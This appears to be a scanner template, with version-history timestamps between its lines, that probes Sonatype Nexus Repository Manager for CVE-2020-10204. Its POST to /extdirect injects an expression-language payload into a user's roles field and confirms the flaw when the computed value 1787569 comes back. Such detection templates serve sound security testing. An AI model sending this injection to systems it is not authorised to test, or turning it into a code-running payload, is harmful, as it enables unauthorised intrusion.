2020-09-15 19:25:55 +00:00
id : cve-2020-10204
2020-07-06 20:24:18 +00:00
info :
name : Sonatype Nexus Repository RCE
auhtor : hetroublemakr
severity : high
2020-08-25 22:52:00 +00:00
description : A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
2020-07-07 06:19:48 +00:00
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
2020-07-06 20:24:18 +00:00
requests :
- method : POST
path :
- '{{BaseURL}}/extdirect'
2020-07-07 06:19:48 +00:00
2020-07-06 20:24:18 +00:00
body : '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
2020-07-07 06:19:48 +00:00
2020-07-06 20:24:18 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "1787569"
part : body
- type : status
status :
2020-08-25 22:52:00 +00:00
- 200